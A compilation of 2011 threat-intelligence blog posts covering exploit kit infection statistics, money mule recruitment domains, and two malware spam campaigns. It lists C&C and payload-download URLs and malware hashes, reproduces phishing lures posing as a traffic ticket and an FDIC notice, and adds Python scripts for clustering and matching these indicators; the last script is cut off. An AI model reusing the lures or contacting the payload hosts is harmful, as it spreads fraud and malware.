1. http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short_30.html

2. http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short_30.html

3. http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short_25.html

4. http://ddanchev.blogspot.com/2011/05/keeping-money-mule-recruiters-on-short.html

5. http://ddanchev.blogspot.com/2011/03/keeping-money-mule-recruiters-on-short.html

6. http://ddanchev.blogspot.com/2011/01/keeping-money-mule-recruiters-on-short.html

7. http://ddanchev.blogspot.com/2010/04/dns-infrastructure-of-money-mule.html

8. http://ddanchev.blogspot.com/2010/04/keeping-money-mule-recruiters-on-short.html

9. http://ddanchev.blogspot.com/2010/03/money-mule-recruitment-campaign-serving.html

10. http://ddanchev.blogspot.com/2010/03/keeping-money-mule-recruiters-on-short.html

11. http://ddanchev.blogspot.com/2010/03/money-mule-recruiters-on-yahoos-web.html

12. http://ddanchev.blogspot.com/2010/02/dissecting-ongoing-money-mule.html

13. http://ddanchev.blogspot.com/2010/02/keeping-money-mule-recruiters-on-short.html

14. http://ddanchev.blogspot.com/2009/12/keeping-reshipping-mule-recruiters-on.html

15. http://ddanchev.blogspot.com/2009/11/keeping-money-mule-recruiters-on-short.html

16. http://ddanchev.blogspot.com/2009/10/standardizing-money-mule-recruitment.html

17. http://ddanchev.blogspot.com/2009/05/inside-money-laundering-groups-spamming.html

18. http://ddanchev.blogspot.com/2008/07/money-mule-recruiters-use-asproxs-fast.html

19. http://ddanchev.blogspot.com/2008/10/money-mules-syndicate-actively.html

20. http://ddanchev.blogspot.com/
Summarizing ZDNet's Zero Day Posts for July (2011-08-22 18:06)

The following is a brief summary of all of my posts at ZDNet's Zero Day for July. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]'Leaked Video of Casey Anthony CONFESSING to Lawyer!' scam spreading on Facebook

02. [4]Anonymous leaks 90,000+ emails from compromised military contractor Booz Allen Hamilton

03. [5]'This girl must be Out of her Mind to do this on live Television!' scam spreading on Facebook

04. [6]Spamvertised bank statements serving scareware

05. [7]Internet Explorer 9 outperforms competing browsers in malware blocking test

06. [8]'Leaked Video! Amy Winehouse on Crack hours before death' scam spreading on Facebook

07. [9]Pfizer's Facebook hacked by AntiSec

08. [10]90,000+ pages compromised in mass iFrame injection attack

09. [11]Amazon's cloud services systematically exploited by cybercriminals

This post has been reproduced from [12]Dancho Danchev's blog. Follow him [13]on Twitter.
A Peek Inside Web Malware Exploitation Kits (2011-08-29 13:19)

With web malware exploitation kits continuing to represent the attack method of choice for the majority of cybercriminals, thanks to the [1]overall susceptibility of end and [2]enterprise users to client-side exploitation attacks, it's always worth taking a peek inside them from the perspective of the malicious attacker.

In this post, we'll take a peek inside three web malware exploitation kits, and discuss what makes them tick in terms of infected OSs, browser plugins and client-side exploits.

Dragon Pack Web Malware Exploitation Kit

[3]

STATISTICS

UNIQUES  WINDOWS  LOADS  PERCENT
583      486      45     9.26%

EXPLOIT  RUN  RATE
JAVAROX  42   93.33
JAVASMB  2    4.44
MDAC     1    2.22

BROWSER  VISITS  LOADS  RATE
MSIE 6   6       1      16.67%
MSIE 7   49      3      6.12%
MSIE 8   187     13     6.95%
Chrome   65      7      10.77%
Firefox  209     20     9.57%
Opera    6       0      0%
Safari   57      0      0%
Other    6       0      0%

OS              VISITS  LOADS  RATE
Windows 95      1       1      100%
Windows 2000    1       0      0%
Windows XP      175     14     8%
Windows XP SP2  22      3      13.64%
Windows Vista   146     12     8.22%
Windows 7       141     15     10.64%

What we've got here is a web malware exploitation kit admin panel that is rather modest in terms of activity. We've got 45 successful loads based on 588 unique visits, with the JavaRox exploit executed 42 times, successfully infecting 20 Firefox users. The exploits have successfully loaded on Windows XP 14 times, on Windows XP SP2 3 times, on Windows Vista 12 times, and on Windows 7 15 times.

Dragon Exploit Pack
STATISTICS

UNIQUES  WINDOWS  LOADS  PERCENT
587      486      45     9.26%

EXPLOIT  RUN  RATE
JAVAJDK  42   93.33
JAVASMB  2    4.44
MDAC     1    2.22

BROWSER  VISITS  LOADS  RATE
MSIE 6   6       1      16.67%
MSIE 7   49      3      6.12%
MSIE 8   187     13     6.95%
Chrome   65      7      10.77%
Firefox  209     20     9.57%
Opera    6       0      0%
Safari   57      0      0%
Other    6       0      0%

OS              VISITS  LOADS  RATE
Windows 95      1       1      100%
Windows 2000    1       0      0%
Windows XP      175     14     8%
Windows XP SP2  22      3      13.64%
Windows Vista   146     12     8.22%
Windows 7       141     15     10.64%


The Dragon Exploit Pack has 45 successful loads based on 587 unique visitors, with the JavaJDK exploit executed successfully 42 times. The kit is counting 13 successful loads on MSIE 8, and another 20 on Firefox, with 14 successful loads recorded for Windows XP, 2 on Windows XP SP2, 12 on Windows Vista and 15 on Windows 7.

Katrin Exploit Pack 
KATRIN

TRAFFIC  LOADS  RATE
19933    3277   17.32%

EXPLOIT      LOADS  RATE
Java JSM     535    16.33%
Java SMB     576    17.58%
Java OBE     914    27.89%
Old 4 PDF    87     2.65%
Libtiff PDF  726    22.15%
MDAC         96     2.93%
Snapshot     104    3.17%
HCP          239    7.29%

BROWSER  TRAFFIC  LOADS  RATE
MSIE 6   1315     452    34.37%
MSIE 7   2403     786    32.64%
MSIE 8   8162     1198   14.68%
MSIE 9   89       6      6.74%
Chrome   2559     274    10.71%
Firefox  4499     522    11.6%
Opera    209      24     11.48%
Safari   542      14     2.58%
Other    150      1      0.67%

OS             TRAFFIC  LOADS  RATE
Windows 98     23       7      30.43%
Windows 2000   38       9      23.68%
Windows 2003   33       7      21.21%
Windows XP     10648    2107   19.79%
Windows Vista  2724     625    22.94%
Windows 7      5451     503    9.23%
Other OS       1016     19     1.87%


The Katrin Exploit Pack has 3277 successful loads based on 19933 unique visits, which represents a 17.32 % infection rate. The Java JSM exploit has been successfully loaded 535 times, Java SMB has been loaded 576 times, Java OBE has been loaded 914 times, Old 4 PDF has been loaded 87 times, Libtiff PDF has been loaded 726 times, MDAC has been loaded 96 times, Snapshot has been loaded 104 times, and HCP has been loaded 239 times.

The kit is counting 452 successful exploitation attempts against MSIE 6, 786 against MSIE 7, 1198 against MSIE 8, 274 against Chrome, 522 against Firefox, 24 against Opera and 14 against Safari. The majority of loads have affected Windows XP installations, with 2107 successful loads targeting the OS, followed by 625 on Windows Vista, and 503 on Windows 7.

Liberty Exploit Pack 
Browser            Uniques  Downloads  Percent
Total (100 %)      3029     555        18.32 %
IE 6 (37.07 %)     1123     397        35.35 % (13.11 %)
IE 7 (30.57 %)     926      89         9.61 % (2.94 %)
Firefox (16.64 %)  504      54         10.71 % (1.78 %)
Unknown (11.89 %)  360      2          0.56 % (0.07 %)
Chrome (2.01 %)    61       9          14.75 % (0.3 %)
Opera (1.82 %)     55       4          7.27 % (0.13 %)


The Liberty Exploit Pack screenshot shows the proportion of successfully infected web browsers, with a total of 555 successful loads based on 3029 unique visitors. 397 loads have affected Internet Explorer 6, 89 Internet Explorer 7, and 54 Firefox.


Bleeding Life Exploit Pack 
In this Bleeding Life web malware exploitation kit, we can clearly see the dynamics behind the infections taking place. We see 554 successful loads based on 4106 unique visitors. JavaSignedApplet has been executed 161 times, Adobe-90-2010-0188 has been executed 67 times, Adobe-80-2010-0188 has been executed 46 times, Java-2010-0842 has been executed 203 times, Adobe-2008-2992 has been executed 74 times, and Adobe-2010-1297 has been executed 2 times.

The majority of the infected population is based in the U.S., United Kingdom, Qatar, and Malaysia. Windows XP has the highest share of infected OSs, with 336 successful loads based on 2098 unique visitors, followed by Windows 7 with 139 loads based on 1256 unique visitors, and 73 loads based on 719 unique visitors for Windows Vista.

This post has been reproduced from [4]Dancho 
Danchev's blog. Follow him [5]on Twitter. 

1. http://www.zdnet.com/blo a /securitv/56-percent-of- 
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2. http://www.zdnet.com/blo a /securitv/kasperskv-12- 
different-vulnerabilities-detected-on-ever v- pc/9283 

3. http://2.bp.blo as pot.com/- 
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4. http://ddanchev.blo as pot.com/ 

5. http://twitter.com/danchodanchev 
Keeping Money Mule Recruiters on a Short Leash - Part Eleven (2011-08-29 15:51)

The following intelligence brief is part of the [1]Keeping Money Mule Recruiters on a Short Leash series. In it, I'll expose currently active money mule recruitment domains, their domain registration details, currently responding IPs, and related ASs.
Money mule recruitment domains, currently responding IPs and registrant emails:

ACWOODE-GROUP.COM - 78.46.105.205 - Email: admin@acwoode-group.com
ACWOODE-GROUP.NET - 78.46.105.205 - Email: admin@acwoode-group.net
ART-GAPSON.COM - 78.46.105.205 - Email: admin@art-gapson.com
CONDOR-LLC-UK.NET - Email: admin@condor-llc-uk.net
CONDORLLC-UK.COM - Email: plods@fxmail.net
DE-DVFGROUP.BE
ELENTY-CO.NET - Email: abcs@mailti.com
ELENTY-LLC.COM - 78.46.105.205 - Email: admin@elenty-llc.com
fabia-art.com - 209.190.4.91 - Email: adios@cutemail.org
fine-artgroup.com - 209.190.4.91
GAPSONART.NET - 78.46.105.205 - Email: admin@gapsonart.net
gmd-contracting.com - 194.242.2.56 - Email: admin@gmd-contracting.com
GURU-GROUP.CC - 78.46.105.205 - Email: admin@guru-group.cc
GURU-GROUP.NET - 78.46.105.205 - Email: jj@cutemail.org
INTECHTODEX-GROUP.COM - 78.46.105.205 - Email: uq@maill3.com
ltd-scg.net - 209.190.4.91 - Email: amykylir@yahoo.com
NARTEN-ART.COM - 78.46.105.205 - Email: glamor@fxmail.net
NARTENART.NET - 78.46.105.205 - Email: admin@nartenart.net
panart-llc.com - 78.46.105.205 - Email: admin@panart-llc.com
REFINEMENT-ANTIQUE.COM - 78.46.105.205 - Email: xe@fxmail.net
REFINEMENTUK-LTD.NET - 78.46.105.205 - Email: admin@refinementuk-ltd.net
SKYLINE-ANTIQUE.COM - 78.46.105.205 - Email: blurs@mailae.com
SKYLINE-LTD.NET - 78.46.105.205 - Email: admin@skyline-ltd.net
techce-group.com - 184.168.64.173 - Email: admin@techce-group.com
TODEX-GROUP.NET - 78.46.105.205 - Email: admin@todex-group.net
triad-webs.com - 85.17.24.226

The domains reside within the following ASs: AS24940, HETZNER-AS Hetzner Online AG RZ; AS16265, LeaseWeb B.V. Amsterdam; AS26496, GODADDY.com, Inc.; AS10297, RoadRunner RR-RC-Enet-Columbus.
Passive DNS view of the 209.190.0.0/17 (AS10297) host with PTR 5b4be.staticxlhost.com, which also returns the related names fabiaart.com, fabia-art.net, fabiaart-ltd.com, fabiaart-usa.com, fine-artgroup.com, fineart-group.com, flash-ukllc.com, guru-co.net, mx.fabia-art.net, mx.fabiaart-usa.com, mx.fine-artgroup.com, mx.fineart-group.com, mx.guru-co.net, panartllc.net, skyline-antique.com and skyline-ltd.net.

Name servers of notice:

NS1.MKNS.SU - 85.25.250.244 - Email: mkns@cheapbox.
NS2.MKNS.SU - 46.4.148.119
NS3.MKNS.SU - 184.82.158.76
NS1.MNAMEDL.SU - 85.25.250.211 - Email: mnamed@yourisp.ru
NS2.MNAMEDL.SU - 46.4.148.118
NS3.MNAMEDL.SU - 184.82.158.75
NS1.MLDNS.SU - 85.25.145.63 - Email: mldns@free-id.ru
NS2.MLDNS.SU - 46.4.148.74
NS3.MLDNS.SU - 184.82.158.74
NS1.NAMESUKNS.CC - Email: pal@bz3.ru
NS2.NAMESUKNS.CC
NS3.NAMESUKNS.CC
NS1.NAMEUK.AT - Email: admin@nameuk.at
NS2.NAMEUK.AT
NS3.NAMEUK.AT
NS1.UKDNSTART.NET - Email: admin@ukdnstart.ne
NS2.UKDNSTART.NET
NS3.UKDNSTART.NET

Note that the three .SU name server sets (MKNS, MNAMEDL, MLDNS) each have their NS1, NS2 and NS3 on the same three network ranges (85.25.x.x, 46.4.148.x and 184.82.158.x), so the name server infrastructure itself is a pivot for finding further fronts, independent of the hosting IPs above.

Monitoring of the ongoing money mule recruitment campaigns continues.
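One way to work the indicators in this brief, as an added example that is not part of the original post: the script below (my code, not the author's) transcribes the domain / responding IP / registrant email triples listed above, lower-cased, and pivots on them. It groups the fronts by responding IP, separates the uninformative admin@<own-domain> WHOIS contacts from third-party mailboxes that could tie separate fronts together, and clusters domains that share an IP or an exact registrant mailbox. Domains the brief lists without a responding IP are kept with None so they still show up as singletons.

```python
"""Pivot the mule-recruitment indicators from the brief above by shared
hosting IP and by registrant mailbox.  Added example: the records are
transcribed from the brief, the clustering logic is not the author's.
"""
from collections import defaultdict

# (domain, responding IP or None, registrant email or None), as in the brief
RECORDS = [
    ("acwoode-group.com", "78.46.105.205", "admin@acwoode-group.com"),
    ("acwoode-group.net", "78.46.105.205", "admin@acwoode-group.net"),
    ("art-gapson.com", "78.46.105.205", "admin@art-gapson.com"),
    ("condor-llc-uk.net", None, "admin@condor-llc-uk.net"),
    ("condorllc-uk.com", None, "plods@fxmail.net"),
    ("de-dvfgroup.be", None, None),
    ("elenty-co.net", None, "abcs@mailti.com"),
    ("elenty-llc.com", "78.46.105.205", "admin@elenty-llc.com"),
    ("fabia-art.com", "209.190.4.91", "adios@cutemail.org"),
    ("fine-artgroup.com", "209.190.4.91", None),
    ("gapsonart.net", "78.46.105.205", "admin@gapsonart.net"),
    ("gmd-contracting.com", "194.242.2.56", "admin@gmd-contracting.com"),
    ("guru-group.cc", "78.46.105.205", "admin@guru-group.cc"),
    ("guru-group.net", "78.46.105.205", "jj@cutemail.org"),
    ("intechtodex-group.com", "78.46.105.205", "uq@maill3.com"),
    ("ltd-scg.net", "209.190.4.91", "amykylir@yahoo.com"),
    ("narten-art.com", "78.46.105.205", "glamor@fxmail.net"),
    ("nartenart.net", "78.46.105.205", "admin@nartenart.net"),
    ("panart-llc.com", "78.46.105.205", "admin@panart-llc.com"),
    ("refinement-antique.com", "78.46.105.205", "xe@fxmail.net"),
    ("refinementuk-ltd.net", "78.46.105.205", "admin@refinementuk-ltd.net"),
    ("skyline-antique.com", "78.46.105.205", "blurs@mailae.com"),
    ("skyline-ltd.net", "78.46.105.205", "admin@skyline-ltd.net"),
    ("techce-group.com", "184.168.64.173", "admin@techce-group.com"),
    ("todex-group.net", "78.46.105.205", "admin@todex-group.net"),
    ("triad-webs.com", "85.17.24.226", None),
]


def by_ip(records):
    """Map each responding IP to the sorted list of fronts it serves."""
    groups = defaultdict(list)
    for domain, ip, _ in records:
        if ip:
            groups[ip].append(domain)
    return {ip: sorted(doms) for ip, doms in groups.items()}


def self_hosted_contact(domain, email):
    """True when the WHOIS contact is admin@<the domain itself>.  That
    pattern carries no pivot value: every throwaway registration gets one."""
    return email is not None and email.lower() == f"admin@{domain.lower()}"


def pivotable_mailboxes(records):
    """Registrant mailboxes on third-party providers, keyed by provider.
    Shared providers (fxmail.net, cutemail.org) are the only registrant
    data in this brief that could tie separate fronts together."""
    providers = defaultdict(list)
    for domain, _, email in records:
        if email and not self_hosted_contact(domain, email):
            providers[email.split("@", 1)[1].lower()].append((domain, email))
    return dict(providers)


def clusters(records):
    """Union-find over domains: two fronts land in one cluster when they
    share a responding IP or an exact third-party registrant mailbox."""
    parent = {domain: domain for domain, _, _ in records}

    def find(x):
        while parent[x] != x:
            parent[x] = parent[parent[x]]  # path halving
            x = parent[x]
        return x

    def union(a, b):
        parent[find(a)] = find(b)

    first_by_ip, first_by_mail = {}, {}
    for domain, ip, email in records:
        if ip:
            if ip in first_by_ip:
                union(domain, first_by_ip[ip])
            first_by_ip.setdefault(ip, domain)
        if email and not self_hosted_contact(domain, email):
            if email in first_by_mail:
                union(domain, first_by_mail[email])
            first_by_mail.setdefault(email, domain)
    members = defaultdict(list)
    for domain, _, _ in records:
        members[find(domain)].append(domain)
    return sorted((sorted(m) for m in members.values()), key=len, reverse=True)


if __name__ == "__main__":
    for ip, doms in sorted(by_ip(RECORDS).items(), key=lambda kv: -len(kv[1])):
        print(f"{ip:16} {len(doms):2d} fronts: {', '.join(doms)}")
    for provider, hits in sorted(pivotable_mailboxes(RECORDS).items()):
        print(f"{provider}: {hits}")
    for cluster in clusters(RECORDS):
        print(len(cluster), cluster)
```

Run as-is it prints the 16 fronts parked on 78.46.105.205, the three on 209.190.4.91, and the fxmail.net and cutemail.org mailboxes that are the only registrant data worth pivoting on here; since no two fronts in this set share an exact mailbox, the clusters reduce to the IP groups, which is itself a useful negative result before spending time on WHOIS.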
Related posts:

[2] Keeping Money Mule Recruiters on a Short Leash - Part Ten
[3] Keeping Money Mule Recruiters on a Short Leash - Part Nine
[5] Keeping Money Mule Recruiters on a Short Leash - Part
[6] Keeping Money Mule Recruiters on a Short Leash - Part Six
[7] Keeping Money Mule Recruiters on a Short Leash - Part
[8] The DNS Infrastructure of the Money Mule Recruitment Ecosystem
[9] Keeping Money Mule Recruiters on a Short Leash - Part Four
[10] Money Mule Recruitment Campaign Serving Client-Side Exploits
[11] Keeping Money Mule Recruiters on a Short Leash - Part
[12] Money Mule Recruiters on Yahoo!'s Web Hosting
[13] Dissecting an Ongoing Money Mule Recruitment Campaign
[14] Keeping Money Mule Recruiters on a Short Leash - Part
[15] Keeping Reshipping Mule Recruiters on a Short Leash
[16] Keeping Money Mule Recruiters on a Short Leash
[17] Standardizing the Money Mule Recruitment Process
[18] Inside a Money Laundering Group's Spamming Operations
[19] Money Mule Recruiters use ASProx's Fast Fluxing Services
Summarizing 3 Years of Research Into Cyber Jihad (2011-09-11 13:34)

On this very special day, I'd like to honor the fallen by summarizing my research into cyber jihad, a topic I'm still highly passionate about. Enjoy and share it with your social circle!

1. [1]Tracking Down Internet Terrorist Propaganda
2. [2]Arabic Extremist Group Forum Messages' Characteristics
3. [3]Cyber Terrorism Communications and Propaganda
4. [4]A Cost-Benefit Analysis of Cyber Terrorism
5. [5]Current State of Internet Jihad
6. [6]Analysis of the Technical Mujahid - Issue One
7. [7]Full List of Hezbollah's Internet Sites
8. [8]Steganography and Cyber Terrorism Communications
9. [9]Hezbollah's DNS Service Providers from 1998 to 2006
10. [10]Mujahideen Secrets Encryption Tool
11. [11]Analyses of Cyber Jihadist Forums and Blogs
12. [12]Cyber Traps for Wannabe Jihadists
13. [13]Inshallahshaheed - Come Out, Come Out Wherever You Are
14. [14]GIMF Switching Blogs
15. [15]GIMF Now Permanently Shut Down
16. [16]GIMF - "We Will Remain"
17. [17]Wisdom of the Anti Cyber Jihadist Crowd
18. [18]Cyber Jihadist Blogs Switching Locations Again
19. [19]Electronic Jihad v3.0 - What Cyber Jihad Isn't
20. [20]Electronic Jihad's Targets List
21. [21]Teaching Cyber Jihadists How to Hack
22. [22]A Botnet of Infected Terrorists?
23. [23]Infecting Terrorist Suspects with Malware
24. [24]The Dark Web and Cyber Jihad
25. [25]Cyber Jihadist Hacking Teams
26. [26]Two Cyber Jihadist Blogs Now Offline
27. [27]Characteristics of Islamist Websites
28. [28]Cyber Traps for Wannabe Jihadists
29. [29]Mujahideen Secrets Encryption Tool
30. [30]An Analysis of the Technical Mujahid - Issue Two
31. [31]Terrorist Groups' Brand Identities
32. [32]A List of Terrorists' Blogs
33. [33]Jihadists' Anonymous Internet Surfing Preferences
34. [34]Sampling Jihadists' IPs
35. [35]Cyber Jihadists and TOR
36. [36]A Cyber Jihadist DoS Tool
37. [37]GIMF Now Permanently Shut Down
38. [38]Mujahideen Secrets 2 Encryption Tool Released
39. [39]Terror on the Internet - Conflict of Interest
Summarizing ZDNet's Zero Day Posts for August (2011-09-27 19:13)

The following is a brief summary of all of my posts at ZDNet's Zero Day for August. You can subscribe to my [1]personal RSS feed, [2]Zero Day's main feed, or follow me on Twitter:

01. [3]Study: Rootkits target pirated copies of Windows XP
02. [4]56 percent of enterprise users using vulnerable Adobe Reader plugins
03. [5]New malware attack circulating on Facebook
04. [6]Kaspersky: 12 different vulnerabilities detected on every PC
05. [7]Spamvertised Uniform traffic tickets and invoices lead to malware
06. [8]Latest version of Skype susceptible to malicious code injection flaw
07. [9]Spamvertised 'Scan from a Xerox WorkCentre Pro' leads to malware
08. [10]Malware Watch: FDIC and Western Union themed emails lead to malware

This post has been reproduced from [11]Dancho Danchev's blog. Follow him [12]on Twitter.

1. http://www.zdnet.com/topics/dancho+danchev?p=1&mode=rss&tag=mantle_skin;content
2. http://feeds.feedburner.com/zdnet/security
3. http://www.zdnet.com/blog/security/study-rootkits-target-pirated-copies-of-windows-xp/9223
4. http://www.zdnet.com/blog/security/56-percent-of-enterprise-users-using-vulnerable-adobe-reader-plugins/9
5. http://www.zdnet.com/blog/security/new-malware-attack-circulating-on-facebook/9281
6. http://www.zdnet.com/blog/security/kaspersky-12-different-vulnerabilities-detected-on-every-pc/9283
7. http://www.zdnet.com/blog/security/spamvertised-uniform-traffic-tickets-and-invoices-lead-to-malware/9289
8. http://www.zdnet.com/blog/security/latest-version-of-skype-susceptible-to-malicious-code-injection-flaw/9295
9. http://www.zdnet.com/blog/security/spamvertised-scan-from-a-xerox-workcentre-pro-leads-to-malware/9315
10. http://www.zdnet.com/blog/security/malware-watch-fdic-and-western-union-themed-emails-lead-to-malware/9328
11. http://ddanchev.blogspot.com/
12. http://twitter.com/danchodanchev
Spamvertised 'Uniform Traffic Ticket' and 'FDIC Notifications' Serving Malware - Historical OSINT (2011-09-28 14:43)

Sample of the spamvertised 'Uniform traffic ticket' email (from the screenshot; sender address not legible):

Subject: Uniform traffic ticket
From: 'automailer-095'
Date: 2011-08-17 05:03:29

New York State - Department of Motor Vehicles
UNIFORM TRAFFIC TICKET
POLICE AGENCY: NEW YORK STATE POLICE
Local Police Code
THE PERSON DESCRIBED ABOVE IS CHARGED AS FOLLOWS
Time: 7:25 AM  Date of Offense: 07 05 2011  In violation of: NYS V AND T LAW
Description of Violation: SPEED OVER 55 ZONE
TO PLEAD, PRINT OUT THE ENCLOSED TICKET AND SEND IT TO TOWN COURT, CHATAM HALL, PO BOX 117

The following intelligence brief will summarize the findings from a brief analysis performed on two malware campaigns from August, namely the [1]spamvertised Uniform Traffic Tickets and the [2]FDIC Notification.

Uniform Traffic Tickets

Spamvertised attachments: Ticket-728-2011.zip; Ticket-064-211.zip; Ticket-728-2011.zip

Detection rates:

Ticket.exe - [3]Gen:Trojan.Heur.FU.bqW@aK9ebrii - Detection rate: 37/43 (86.0 %)
MD5: 6361d4a40485345c18473f3c6b4b6609
SHA1: 50b09bb2e0044aa139a84c2e445a56f01d70c185
SHA256: ca67a14bfed2a7bc2ac8be9c01cb17d5da12b75320b4bad4fe8d8a6759ad9725

Ticket1.exe - [4]Trojan-Downloader.Win32.Small.ccxz - Detection rate: 36/44 (81.8 %)
MD5: e2a2d67b8a52ae655f92779bec296676
SHA1: ed3df72b4e073ffba7174ebc8cb77b2b7d012cbf
SHA256: 50b104c5f8314327e03b01e7f7c2535d8de7cd9f73f8e16d1364c7fd021a90cc

Upon execution the samples phone back to:

sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (survey-providers.info also responds to the same IP) - AS51630 - Email: admin@sdkjgndfjnf.ru
rattsillis.com/ftp/g.php - 195.189.226.109; 178.208.77.247; 195.189.226.107; 195.189.226.108 - AS41018 - Email: admin@jokelimo.com
rattsillis.com/pusk3.exe - 195.189.226.109; 178.208.77.247; 195.189.226.107; 195.189.226.108 - AS41018 - Email: admin@jokelimo.com

DNS emulation of ns1.lemanbrostm.info reveals two domains using the same name server: belidiskalom.com - 178.208.76.175 - Email: admin@belidiskalom.com, and lemanbrostm.info - Email: coz@yahoo.com.

Known MD5 modifications for pusk3.exe at rattsillis.com:

c6dab856705b5dfd09b2adbe10701b05
f167213c6a79f2313995e80a8ac29939
f4764cce5c3795b1d63a299a5329d2e2
dae9e7653573478a6b41a62f7cb99c12
69c983c9dfaf37e346004c9aaf54a3d0
d875b8e32a231405c7fa96b810e9b361
628270c6e44b0fa21ef8e87c6bc36f57
9b69dabd876e967bcd2eb85465175e3b
0434c084dba8626df980c7974d5728e1

Related binaries and associated MD5 modifications:

rattsillis.com/blood.exe - MD5: 23795cb9b2f5e19eff0df0cf2fba9247; 82b6f18b130a1f0ce1ce928d0980fab0
rattsillis.com/pusk.exe - MD5: 55d8e25bc373a98c5c29284c989953ab; 368c86556e827d898f043a4d5f378fa0; 7411d0d29db91f2625ee36d438eb6ac4; 3ea4e9fd297b3058ebbb360c1581aaac
rattsillis.com/pusk2.exe - MD5: dae9e7653573478a6b41a62f7cb99c12; b73705c097c9be9779730d801ad098e0; d7952c1e77d7bb250cdfa88e157fb5a8

Known MD5 modifications for pusk3.exe at sdkjgndfjnf.ru: 8672f021e7705b6a8132b7dfc21617cf

sdkjgndfjnf.ru/blood.exe - MD5: 577cf0b7ca3d5bcbe35764024f241fa8; ebf7278a7239378e7d70d426779962ce
sdkjgndfjnf.ru/pusk2.exe - MD5: d9e36e25a3181f574fd5d520cb501d3a
sdkjgndfjnf.ru/pusk.exe - MD5: fce04f7681283207d585561ed91e77b4

Detection rate for blood.exe:

blood.exe - [5]Trojan-Spy.Win32.Zbot - 25/44 (56.8 %)
MD5: 577cf0b7ca3d5bcbe35764024f241fa8
SHA1: 30f542a44d06d9125cdfbdd38d79de778e4c0791
SHA256: 1741ef5d24641ee99b5d78a68109162bebc714c3d19abc37e3d4472f3dcd6f18
Sample of the spamvertised 'FDIC notification' email (from the screenshot; the sender is spoofed to look like fdic.gov):

Subject: FDIC notification
From: "no reply" <no_reply@fdic.gov>
Date: 2011-08-30 02:23:03

Dear customer,

Your account ACH and WIRE transaction have been temporarily suspended for security reasons due to the expiration of your security version. To download and install the newest installations read the document(pdf) attached below.

As soon as it is setup, you transaction abilities will be fully restored.

Best Regards, Online Security department, Federal Deposit Insurance Corporation.

FDIC Notification

Spamvertised attachment: FDIC_Document.zip

Detection rate:

FDIC_Document.exe - Gen:Trojan.Heur.FU.bqW@a45Fklbi - 35/44 (79.5 %)
MD5: 7b5a271c58c6bb18d79cd48353127ff6
SHA1: 6526b6097df42f93bee25d7ea73f95d2fcc24d3a
SHA256: a09165c71a8dd2a1338b2bd0c92ae07495041ae15592e3432bd50600e6ef2af0

Upon execution the sample phones back to:

rattsillis.com/ftp/g.php
rattsillis.com/blood.exe - MD5: 23795cb9b2f5e19eff0df0cf2fba9247; 82b6f18b130a1f0ce1ce928d0980fab0

What's particularly interesting is that both campaigns have been launched by the same cybercriminal, using the same C&C, rattsillis.com, which was also seen in the [6]spamvertised ACH Payment Canceled campaign.
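As an added example that is not part of the original post (my code, not the author's), the script below turns the phone-home URLs and payload hashes listed for the two campaigns into a small indicator set and runs proxy log lines against it. The log lines are constructed for the demonstration and the assumed log format is Squid's native access.log. URL matching normalizes host case, port and query string, so a request for http://RATTSILLIS.COM:80/ftp/g.php?id=3 still hits the indicator rattsillis.com/ftp/g.php, and the shared C&C host surfaces as an indicator tagged with both campaigns rather than as two unrelated alerts.

```python
"""Match the network and hash indicators from the two campaigns above
against proxy log lines and report which campaign each hit belongs to.
Added example: IOC values are from the brief, the log lines are constructed.
"""
import re
from urllib.parse import urlsplit

# Phone-home URLs per campaign, as listed in the brief (no scheme given there)
CAMPAIGN_URLS = {
    "uniform-traffic-ticket": [
        "sdkjgndfjnf.ru/pusk3.exe",
        "rattsillis.com/ftp/g.php",
        "rattsillis.com/pusk3.exe",
    ],
    "fdic-notification": [
        "rattsillis.com/ftp/g.php",
        "rattsillis.com/blood.exe",
    ],
}

# A subset of the payload MD5s from the brief, per campaign
CAMPAIGN_MD5 = {
    "uniform-traffic-ticket": {
        "6361d4a40485345c18473f3c6b4b6609",  # Ticket.exe
        "e2a2d67b8a52ae655f92779bec296676",  # Ticket1.exe
        "577cf0b7ca3d5bcbe35764024f241fa8",  # sdkjgndfjnf.ru/blood.exe
    },
    "fdic-notification": {
        "7b5a271c58c6bb18d79cd48353127ff6",  # FDIC_Document.exe
        "23795cb9b2f5e19eff0df0cf2fba9247",  # rattsillis.com/blood.exe
        "82b6f18b130a1f0ce1ce928d0980fab0",
    },
}


def normalize(url):
    """Lower-case host, drop scheme, port and query string, keep the path,
    so an indicator written as 'host/path' matches what a proxy logs."""
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    return f"{(parts.hostname or '').lower()}{parts.path or '/'}"


def build_index(campaign_urls):
    """normalized URL -> set of campaign names.  Overlap between campaigns
    is visible directly as entries tagged with more than one name."""
    index = {}
    for name, urls in campaign_urls.items():
        for url in urls:
            index.setdefault(normalize(url), set()).add(name)
    return index


def shared_hosts(campaign_urls):
    """Hosts used by more than one campaign (the C&C overlap noted above)."""
    hosts = {}
    for name, urls in campaign_urls.items():
        for url in urls:
            hosts.setdefault(normalize(url).split("/", 1)[0], set()).add(name)
    return {host: names for host, names in hosts.items() if len(names) > 1}


# Squid native access.log: time elapsed client status/code bytes method URL ...
LOG_RE = re.compile(
    r"^(?P<ts>\S+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+(?P<method>\S+)\s+(?P<url>\S+)"
)


def match_logs(lines, index=None):
    """Return (timestamp, client, url, [campaigns]) for each line whose
    requested URL normalizes to a known indicator."""
    index = index or build_index(CAMPAIGN_URLS)
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a Squid-format line; skip rather than guess
        key = normalize(m.group("url"))
        if key in index:
            hits.append((m.group("ts"), m.group("client"), m.group("url"), sorted(index[key])))
    return hits


def match_hashes(md5s, campaign_md5=CAMPAIGN_MD5):
    """Map observed MD5s (sandbox or EDR export) to the campaigns that dropped them."""
    found = {}
    for digest in md5s:
        digest = digest.lower()
        for name, known in campaign_md5.items():
            if digest in known:
                found.setdefault(digest, []).append(name)
    return found


# Constructed sample log lines (not from the page); clients and times are invented
SAMPLE_LOG = [
    "1313564609.123 210 10.0.0.15 TCP_MISS/200 71234 GET http://sdkjgndfjnf.ru/pusk3.exe - DIRECT/91.220.0.55 application/octet-stream",
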